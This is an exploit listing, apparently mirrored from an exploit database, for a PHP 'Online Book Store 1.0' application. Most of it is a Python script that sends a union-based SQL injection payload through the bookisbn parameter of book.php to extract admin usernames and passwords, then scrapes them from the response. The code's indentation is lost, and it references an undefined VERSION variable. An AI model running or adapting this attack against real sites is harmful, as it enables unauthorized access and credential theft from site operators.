Exploit for Online Book Store 1.0 SQL Injection

## https://sploitus.com/exploit?id=PACKETSTORM:159964
# Exploit Title: Online Book Store Union Based Sql Injection  
# Date: 2020-10-25  
# Exploit Author: ferhatcil  
# Vendor Homepage: https://projectworlds.in/  
# Software Link:  
https://www.sourcecodester.com/php/14550/online-book-store-php-full-source-code.html  
# Version: 1.0  
# Tested on: Ubuntu 18.04  
# CVE : N/A  
  
Exploit Code  
  
import getopt  
import json  
import sys  
import requests  
import colorama  
from colorama import Fore, Style  
from bs4 import BeautifulSoup  
  
def usage():  
print("Online Book Store SQLi {} ( github.com/ferhatcil )".format(VERSION))  
print("Usage: " + sys.argv[0] + " [OPTIONS]")  
print(" --domain\texample.com")  
print("Examples:")  
print(" python3 " + sys.argv[0] + " --domain http://example.com")  
print(" python3 " + sys.argv[0] + " --domain http://example.com/bookstore")  
sys.exit(1)  
  
  
def xx(domain):  
if 'http://' not in domain:  
domain = "http://"+domain+"/book.php?bookisbn=-x' union select  
1,2,3,4,group_concat(name,':',pass),6,7 from admin -- -"  
else:  
domain = domain+"/book.php?bookisbn=-x' union select  
1,2,3,4,group_concat(name,':',pass),6,7 from admin -- -"  
try:  
r = requests.get(domain)  
soup = BeautifulSoup(r.text,'html.parser')  
data = soup.find('div',{'class':'col-md-6'}).find("p").text  
print(f"{Fore.GREEN}[+] {Style.RESET_ALL}{Fore.YELLOW}"+ data + f"{  
Style.RESET_ALL}")  
except:  
print(f"{Fore.RED}"+ "[-] Error" + f"{Style.RESET_ALL}")  
  
if __name__ == "__main__":  
try:  
opts, args = getopt.getopt(sys.argv[1:], "d", ["domain="])  
except(getopt.GetoptError) as err:  
print(err)  
sys.exit(-1)  
  
for o, a in opts:  
if o in ("-d", "--domain"):  
xx(a)  
elif o in ("-h", "--help"):  
usage()  
sys.exit()  
else:  
assert False, "unhandled option"  
sys.exit(-1)  
  
argc = len(sys.argv)  
if argc < 2:  
usage()